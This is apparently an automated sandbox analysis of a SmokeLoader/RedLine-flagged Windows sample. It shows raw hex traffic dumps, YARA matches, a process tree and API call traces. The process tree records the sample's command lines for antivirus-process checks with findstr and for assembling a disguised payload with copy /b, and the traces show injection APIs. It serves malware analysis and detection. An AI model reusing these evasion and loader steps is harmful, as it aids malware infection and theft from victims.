                                      2024-07-15 04:11:14 UTC16384INData Raw: 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 28 2e 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 ee c4 ff ff a1 28 2e 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39 fe ff ff 75 1e 8b 47 5c 8b 4d e8 69 c0 20 40 00 00 83 7f 0c 02 8d 44 08 08 75 05 83 08 20 eb 03 83 20 df 81 7d 0c 11 01 00 00 75 75
                                      Data Ascii: E}Nt9E}9Et(.Guy9EtMyuk39EQu;|VUi @Tu@@tyP(.G3A#MEE;t>=uw\Shu9uG\Mi @Du }uu
                                      2024-07-15 04:11:14 UTC16384INData Raw: 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53 00 65 00 74 00 46 00 69 00 6c 00 65 00 41 00 74 00 74 00 72 00 69 00 62 00 75 00 74 00 65 00 73 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 00 2e 00 00 00 53 00 65 00 74 00 46 00 69 00 6c
                                      Data Ascii: a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)SetFileAttributes failed.SetFil
                                      2024-07-15 04:11:14 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 0a 08 27 20 21 1a 87 33 37 29 e4 42 45 36 ff 50 52 3b ff 65 65 4a ff 67 69 68 ff 48 4e 88 ff 2a 45 b7 ff 08 1c ca ff 41 44 6c fa 0e 0e 01 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 04 03 10 17 19 13 65 2b 2e 23 c9 3b 3d 30 ff 47 4a 37 ff 59 5c 42 ff 61 64 5b ff 4d 58 96
                                      Data Ascii: ' !37)BE6PR;eeJgihHN*EADl#e+.#;=0GJ7Y\Bad[MX
                                      2024-07-15 04:11:14 UTC16384INData Raw: 05 40 81 40 00 00 19 00 09 01 68 00 f8 03 00 00 53 00 79 00 73 00 4c 00 69 00 73 00 74 00 56 00 69 00 65 00 77 00 33 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 50 00 00 00 00 16 00 14 00 07 04 00 00 ff ff 82 00 ff ff 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 1c 00 3c 00 0e 00 03 04 00 00 ff ff 80 00 00 00 00 00 00 00 00 00 01 00 ff ff 00 00 00 00 00 00 00 00 c8 08 00 80 01 00 00 00 00 00 a2 00 16 00 00 00 00 00 00 00 08 00 00 00 00 01 4d 00 53 00 20 00 53 00 68 00 65 00 6c 00 6c 00 20 00 44 00 6c 00 67 00 00 00 00 00 00 00 00 00 00 00 01 00 02 50 07 00 07 00 94 00 08 00 06 04 00 00 ff ff 82 00 00 00 00 00 00 00 01 00 04 00 40 40 00 00 01 00 20 00 3f 20 00 00 02 00 30 30 00 00 01 00 20 00 68 26 00 00 01 00 20 20 00 00 01
                                      Data Ascii: @@hSysListView32PgP<MS Shell DlgP@@ ? 00 h&
                                      2024-07-15 04:11:14 UTC16384INData Raw: bf 27 f6 3d 50 31 7c 90 97 ee cc fc 8e 41 47 c9 5c c5 30 9d ea e5 7c 8e 9d a1 7a a5 00 f9 dd dd 1d 6a 52 56 6a fa ec 83 7f 1e e2 56 5e d3 c3 28 bb f8 5f ef 8e fb 5c 38 9b 1f b6 1f 15 3b 8d 63 07 6f dc 81 4a 74 fc 5e 4f 91 8e 53 2b 68 ed 02 1e 77 32 b5 cc ce fc f3 03 4d 58 13 0e d5 3a ea 1d 53 af f3 2e 5b 1b c5 ee 70 f4 7c c1 71 1f 2f 28 51 26 33 7c 84 e2 3e 30 af d9 bf 16 93 11 d1 fb e4 d9 91 ca 7b 67 b6 3d ab 19 7f 6f c7 d0 4c 27 fe c9 45 44 e1 1c 52 41 14 bb b1 1c 5a 63 aa 9a a0 9b ae 5b aa d1 3f 6d 54 5d fd 7a 9d 34 04 5c 68 59 18 9f 15 d6 32 ff 44 18 6c 4f dc 73 32 c8 bb 2d f5 3f 82 c0 db 87 8b cf 3e f2 63 44 08 f7 b5 19 16 f8 a9 48 8b 67 78 d6 14 c0 e3 28 d9 99 5f 93 ac a4 96 3d 24 93 ba 2d ee 3e ba 32 2e d9 87 c9 58 60 18 58 68 7c 3d 39 86 09 ae 1a
                                      Data Ascii: '=P1|AG\0|zjRVjV^(_\8;coJt^OS+hw2MX:S.[p|q/(Q&3|>0{g=oL'EDRAZc[?mT]z4\hY2DlOs2-?>cDHgx(_=$->2.X`Xh|=9
                                      2024-07-15 04:11:14 UTC16384INData Raw: d4 98 75 09 e4 0b 67 4f 72 0f 74 8b 71 b6 dc de b3 6d 6b 24 a2 f8 e2 90 d9 63 47 de b2 ad e4 43 10 d1 62 dd 4c b1 8f 76 0b 15 00 04 f5 63 c9 b7 a2 3a 23 b6 23 a6 3c c6 ea e1 92 95 60 30 cd 32 a5 88 b8 ca 44 2b d0 34 11 e7 10 5c dc 37 30 d3 25 06 b4 56 a3 aa 40 09 dd b2 cf aa e0 c4 92 e5 7c 88 75 72 c7 ee e7 a1 a4 18 c7 27 6b 04 09 41 93 ac a4 19 b4 89 29 fd f4 ba e5 27 26 9a 3c 28 00 68 6f 58 3c 04 fb 5f 6a c3 9f 4c 51 b9 e1 af fc a6 d8 cb 3b 92 0d 45 82 35 f4 8f 86 c8 a4 2e 56 91 60 49 b4 f0 7a 53 e8 23 da f1 a6 7a 10 39 ad b1 a1 70 7f f4 2d a4 a0 6e bb 30 28 25 e1 72 a4 e3 5e a0 a0 a1 9b d4 34 53 4d b0 8b bc 54 b0 63 be 1e c5 b1 ae b9 6c 64 ee d7 2b 3b 2e 13 80 d0 ca 29 dd 4b 45 11 78 26 81 d6 6c 37 b2 fd 07 51 a3 79 f4 b2 e7 f7 ad 99 56 f5 9d 59 fc e4
                                      Data Ascii: ugOrtqmk$cGCbLvc:##<`02D+4\70%V@|ur'kA)'&<(hoX<_jLQ;E5.V`IzS#z9p-n0(%r^4SMTcld+;.)KEx&l7QyVY
                                      2024-07-15 04:11:14 UTC16384INData Raw: 2a c6 49 17 71 5c 5b 53 30 ee a5 72 ff 6b d3 aa ef 8a 96 3f 6b 98 22 28 c3 57 e0 45 fb ca c6 1b e0 00 7f cf ca 03 f1 78 22 6a 9b 3e 03 f9 c2 fe 21 96 ef 2e e1 d8 dd 74 1d 52 cb 65 bc a5 69 36 93 9e f0 49 64 fe 8d 81 58 ce ce ae 43 47 5c 82 29 f0 61 16 66 3f f4 e8 37 83 e8 6f ec 17 3a da ea c9 0d 39 7b c1 d1 ac df 26 3f 94 cf e4 f1 ad 1a 53 69 1f 11 60 7a 3a 2c c8 2b 3e 72 c2 43 3a d0 2e 1e f5 ad 69 82 6c 41 c1 21 77 57 9f 8b 26 24 51 f9 15 3e 2f 54 65 f4 07 ce 00 ac 03 e9 bf 98 1e f3 87 6a 50 6b ac 99 4b 4c 3c 99 81 24 88 7e f7 a2 76 d0 1e f0 db 98 6a d0 74 46 d4 e8 26 5a 3e bd 92 58 6d 9c 60 fb d4 e7 b6 4b ca de 7f e9 de 03 13 58 e0 70 80 d2 75 20 48 1b ef 92 5d 01 f7 15 91 ed 6b a7 58 55 88 07 ff ee c5 36 4a c6 eb 0e 77 ae 90 63 a5 bf c5 2a 32 65 a0 65
                                      Data Ascii: *Iq\[S0rk?k"(WEx"j>!.tRei6IdXCG\)af?7o:9{&?Si`z:,+>rC:.ilA!wW&$Q>/TejPkKL<$~vjtF&Z>Xm`KXpu H]kXU6Jwc*2ee
                                      2024-07-15 04:11:14 UTC16384INData Raw: d5 b0 00 d3 59 2e 43 3d 98 2d 95 e5 09 f9 2c 3d 3c c4 71 b8 72 55 b8 6b 12 42 bd 2d 17 aa d6 04 42 27 69 12 75 c7 be 4e 7d 72 06 e7 dd c2 62 70 06 9b 30 09 f1 b7 d9 85 26 ba f6 db f6 46 7e 05 a8 5a 88 37 37 48 d7 48 79 87 3f a9 07 3c 8d 82 16 aa dd fb 15 03 6f 93 9a 30 64 e1 17 10 37 fa b9 50 6a 96 2d 31 1e 3d 79 f1 92 87 dc f4 83 dc 41 f1 ce 46 3f 05 ee cd 81 63 99 29 36 9e 68 b5 f0 af 15 2c 10 38 24 6e 6c ad 15 40 6b 9f f9 18 6c c4 e7 80 fc 04 49 8e d4 71 a3 bc 5e 68 f1 87 fb a6 6d 97 64 54 7a d1 2a a8 17 6e 39 d3 1c 30 57 48 c5 86 fe 6f 3b 75 89 7c 91 ac f5 19 3b 92 f8 21 1c 9b 6f 01 18 de 8f 98 22 11 72 24 36 e5 25 7e 35 eb 5e 18 67 fa 84 e2 5b 93 30 61 6f f5 40 ed 98 20 36 4d dc 4d 43 46 73 f2 5c c1 71 58 7f 76 7e 74 4e f4 4b 1a db 17 29 26 53 25 68
                                      Data Ascii: Y.C=-,=<qrUkB-B'iuN}rbp0&F~Z77HHy?<o0d7Pj-1=yAF?c)6h,8$nl@klIq^hmdTz*n90WHo;u|;!o"r$6%~5^g[0ao@ 6MMCFs\qXv~tNK)&S%h
                                      2024-07-15 04:11:14 UTC16384INData Raw: 42 6d ca 92 38 a1 ac b8 19 e9 b8 97 5e 47 67 c7 62 91 e6 c2 93 86 58 50 5a 6a e2 be 45 24 23 d2 9a 3e d5 ad 69 ea f0 0b e1 e7 24 97 64 15 2e 64 30 fa 49 19 ed 64 d4 c1 8c 5e 4c 69 1c 99 af 72 d7 3f a9 6a 86 ad e7 8d 86 1b 27 19 40 0b 67 df 8a 33 27 63 5e a9 27 da 05 ea d5 cd 67 b3 8e 19 05 5e 3f 94 50 02 5f ce 43 29 9f 91 58 b0 b9 c7 2e 98 c8 09 6b 96 f1 00 7c 11 80 ae 2e 5b 20 23 3c 71 e2 35 6c 6a 7d 28 fa ea 33 5d c0 4a 9b 1e 44 73 a6 82 50 c8 b6 43 5e 5e d2 8f 3f 04 3c cc f2 b9 dd b9 76 86 d2 40 fe f8 8a 66 f0 86 e9 b8 82 9e dd d7 3b 8e b6 c9 c3 bd aa a4 ec 9b 39 c4 85 2d b5 36 0e a7 ab 82 80 85 22 5c e6 4c 7f c0 ed 2b a8 c8 b2 d0 98 70 5f 24 6a 12 9f a4 5c a8 2a e5 30 93 21 6f ee 28 b0 f2 82 54 ce 97 81 bc 50 38 6b 88 2b 60 46 50 3b 8b ad ab 9a 7f 69
                                      Data Ascii: Bm8^GgbXPZjE$#>i$d.d0Id^Lir?j'@g3'c^'g^?P_C)X.k|.[ #<q5lj}(3]JDsPC^^?<v@f;9-6"\L+p_$j\*0!o(TP8k+`FP;i


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:00:10:03
                                      Start date:15/07/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0x400000
                                      File size:345'600 bytes
                                      MD5 hash:1AAE19C81605BF0A5851E42E3574A83C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2182772532.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2183129368.000000000229B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:00:10:09
                                      Start date:15/07/2024
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0x7ff674740000
                                      File size:5'141'208 bytes
                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:4
                                      Start time:00:10:28
                                      Start date:15/07/2024
                                      Path:C:\Users\user\AppData\Roaming\wjshsfa
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\wjshsfa
                                      Imagebase:0x400000
                                      File size:345'600 bytes
                                      MD5 hash:1AAE19C81605BF0A5851E42E3574A83C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2417051568.000000000214B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2417110423.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 34%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:7
                                      Start time:00:11:15
                                      Start date:15/07/2024
                                      Path:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Local\Temp\9CFE.exe
                                      Imagebase:0x400000
                                      File size:2'074'333 bytes
                                      MD5 hash:C71D322F4A1D526CC0E5B3E010C184BE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 11%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:8
                                      Start time:00:11:19
                                      Start date:15/07/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:00:11:20
                                      Start date:15/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:00:11:20
                                      Start date:15/07/2024
                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                      Wow64 process (32bit):true
                                      Commandline:tasklist
                                      Imagebase:0xec0000
                                      File size:79'360 bytes
                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:11
                                      Start time:00:11:20
                                      Start date:15/07/2024
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr /I "wrsa.exe opssvc.exe"
                                      Imagebase:0x40000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:12
                                      Start time:00:11:21
                                      Start date:15/07/2024
                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                      Wow64 process (32bit):true
                                      Commandline:tasklist
                                      Imagebase:0xec0000
                                      File size:79'360 bytes
                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:13
                                      Start time:00:11:21
                                      Start date:15/07/2024
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                                      Imagebase:0x40000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:14
                                      Start time:00:11:21
                                      Start date:15/07/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c md 78801
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:15
                                      Start time:00:11:22
                                      Start date:15/07/2024
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr /V "rapidconfidentialityspokedrill" Thanks
                                      Imagebase:0x40000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:16
                                      Start time:00:11:22
                                      Start date:15/07/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c copy /b Thanksgiving + Arnold + Daily + Mobiles + Drugs + Log + Shoes + Bd + Representations + Investment + Explore + Submissions + Bosnia + Closing + Supervisors 78801\B
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:17
                                      Start time:00:11:22
                                      Start date:15/07/2024
                                      Path:C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      Wow64 process (32bit):true
                                      Commandline:78801\Later.pif 78801\B
                                      Imagebase:0xbf0000
                                      File size:937'776 bytes
                                      MD5 hash:B06E67F9767E5023892D9698703AD098
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:18
                                      Start time:00:11:22
                                      Start date:15/07/2024
                                      Path:C:\Windows\SysWOW64\timeout.exe
                                      Wow64 process (32bit):true
                                      Commandline:timeout 5
                                      Imagebase:0x6b0000
                                      File size:25'088 bytes
                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:19
                                      Start time:00:13:00
                                      Start date:15/07/2024
                                      Path:C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      Imagebase:0xbf0000
                                      File size:937'776 bytes
                                      MD5 hash:B06E67F9767E5023892D9698703AD098
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: OlympicDestroyer_1, Description: OlympicDestroyer Payload, Source: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:8%
                                        Dynamic/Decrypted Code Coverage:28.6%
                                        Signature Coverage:65.3%
                                        Total number of Nodes:98
                                        Total number of Limit Nodes:3
                                        execution_graph 3604 21d003c 3605 21d0049 3604->3605 3617 21d0e0f SetErrorMode SetErrorMode 3605->3617 3610 21d0265 3611 21d02ce VirtualProtect 3610->3611 3613 21d030b 3611->3613 3612 21d0439 VirtualFree 3615 21d04be LoadLibraryA 3612->3615 3613->3612 3616 21d08c7 3615->3616 3618 21d0223 3617->3618 3619 21d0d90 3618->3619 3620 21d0dad 3619->3620 3621 21d0dbb GetPEB 3620->3621 3622 21d0238 VirtualAlloc 3620->3622 3621->3622 3622->3610 3664 402e63 3666 402e67 3664->3666 3665 401918 8 API calls 3667 402f44 3665->3667 3666->3665 3666->3667 3706 401543 3707 401546 3706->3707 3708 4015e6 NtDuplicateObject 3707->3708 3717 401702 3707->3717 3709 401603 NtCreateSection 3708->3709 3708->3717 3710 401683 NtCreateSection 3709->3710 3711 401629 NtMapViewOfSection 3709->3711 3713 4016af 3710->3713 3710->3717 3711->3710 3712 40164c NtMapViewOfSection 3711->3712 3712->3710 3714 40166a 3712->3714 3715 4016b9 NtMapViewOfSection 3713->3715 3713->3717 3714->3710 3716 4016e0 NtMapViewOfSection 3715->3716 3715->3717 3716->3717 3768 401924 3769 401929 3768->3769 3770 40195e Sleep 3769->3770 3771 401979 3770->3771 3772 401538 7 API calls 3771->3772 3773 40198a 3771->3773 3772->3773 3660 402fe9 3661 403140 3660->3661 3662 403013 3660->3662 3662->3661 3663 4030ce RtlCreateUserThread NtTerminateProcess 3662->3663 3663->3661 3623 22a18fc 3624 22a190b 3623->3624 3627 22a209c 3624->3627 3628 22a20b7 3627->3628 3629 22a20c0 CreateToolhelp32Snapshot 3628->3629 3630 22a20dc Module32First 3628->3630 3629->3628 3629->3630 3631 22a20eb 3630->3631 3632 22a1914 3630->3632 3634 22a1d5b 3631->3634 3635 22a1d86 3634->3635 3636 22a1d97 VirtualAlloc 3635->3636 3637 22a1dcf 3635->3637 3636->3637 3684 401496 3685 401447 3684->3685 3685->3684 3686 4015e6 NtDuplicateObject 3685->3686 3692 40152f 3685->3692 3687 401603 NtCreateSection 3686->3687 3686->3692 3688 401683 NtCreateSection 3687->3688 3689 401629 NtMapViewOfSection 3687->3689 3691 4016af 3688->3691 3688->3692 3689->3688 3690 40164c NtMapViewOfSection 3689->3690 3690->3688 3693 40166a 3690->3693 3691->3692 3694 4016b9 NtMapViewOfSection 3691->3694 3693->3688 3694->3692 3695 4016e0 NtMapViewOfSection 3694->3695 3695->3692 3742 21d092b GetPEB 3743 21d0972 3742->3743 3638 402eb7 3641 402eb8 3638->3641 3639 402f44 3641->3639 3642 401918 3641->3642 3643 401929 3642->3643 3644 40195e Sleep 3643->3644 3645 401979 3644->3645 3647 40198a 3645->3647 3648 401538 3645->3648 3647->3639 3649 401539 3648->3649 3650 4015e6 NtDuplicateObject 3649->3650 3656 401702 3649->3656 3651 401603 NtCreateSection 3650->3651 3650->3656 3652 401683 NtCreateSection 3651->3652 3653 401629 NtMapViewOfSection 3651->3653 3655 4016af 3652->3655 3652->3656 3653->3652 3654 40164c NtMapViewOfSection 3653->3654 3654->3652 3657 40166a 3654->3657 3655->3656 3658 4016b9 NtMapViewOfSection 3655->3658 3656->3647 3657->3652 3658->3656 3659 4016e0 NtMapViewOfSection 3658->3659 3659->3656 3668 4014de 3669 401447 3668->3669 3670 4015e6 NtDuplicateObject 3669->3670 3679 40152f 3669->3679 3671 401603 NtCreateSection 3670->3671 3670->3679 3672 401683 NtCreateSection 3671->3672 3673 401629 NtMapViewOfSection 3671->3673 3675 4016af 3672->3675 3672->3679 3673->3672 3674 40164c NtMapViewOfSection 3673->3674 3674->3672 3676 40166a 3674->3676 3677 4016b9 NtMapViewOfSection 3675->3677 3675->3679 3676->3672 3678 4016e0 NtMapViewOfSection 3677->3678 3677->3679 3678->3679

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 85 401496-4014a5 86 4014a7 85->86 87 40151b-40152d 85->87 88 4014a9-4014b5 86->88 89 4014cf 86->89 96 4014ba 87->96 97 40152f-401535 87->97 91 401471-401472 88->91 92 4014b7-4014b8 88->92 94 4014d6 89->94 98 401473-401484 91->98 95 401449 92->95 92->96 94->94 99 4014d8 94->99 101 40147b-40148e call 4011b7 95->101 102 40144b 95->102 103 401447-401456 96->103 104 4014bc-4014c3 96->104 98->101 99->87 101->85 107 40144c-401470 102->107 103->107 108 4014c5-4014c8 104->108 109 401539-401567 104->109 107->98 108->89 119 401558-401563 109->119 120 40156a-401590 call 4011b7 109->120 119->120 127 401592 120->127 128 401595-40159a 120->128 127->128 130 4015a0-4015b1 128->130 131 4018b8-4018c0 128->131 135 4018b6-4018c5 130->135 136 4015b7-4015e0 130->136 131->128 139 4018da 135->139 140 4018cb-4018d6 135->140 136->135 145 4015e6-4015fd NtDuplicateObject 136->145 139->140 141 4018dd-401915 call 4011b7 139->141 140->141 145->135 146 401603-401627 NtCreateSection 145->146 149 401683-4016a9 NtCreateSection 146->149 150 401629-40164a NtMapViewOfSection 146->150 149->135 153 4016af-4016b3 149->153 150->149 152 40164c-401668 NtMapViewOfSection 150->152 152->149 155 40166a-401680 152->155 153->135 156 4016b9-4016da NtMapViewOfSection 153->156 155->149 156->135 158 4016e0-4016fc NtMapViewOfSection 156->158 158->135 161 401702 call 401707 158->161
                                        APIs
                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectView
                                        • String ID:
                                        • API String ID: 1652636561-0
                                        • Opcode ID: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                        • Instruction ID: 8e4940cc2d5d294876689a6a874cb0cc3c399929e81e9dec1e5d288c8cd9e9dd
                                        • Opcode Fuzzy Hash: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
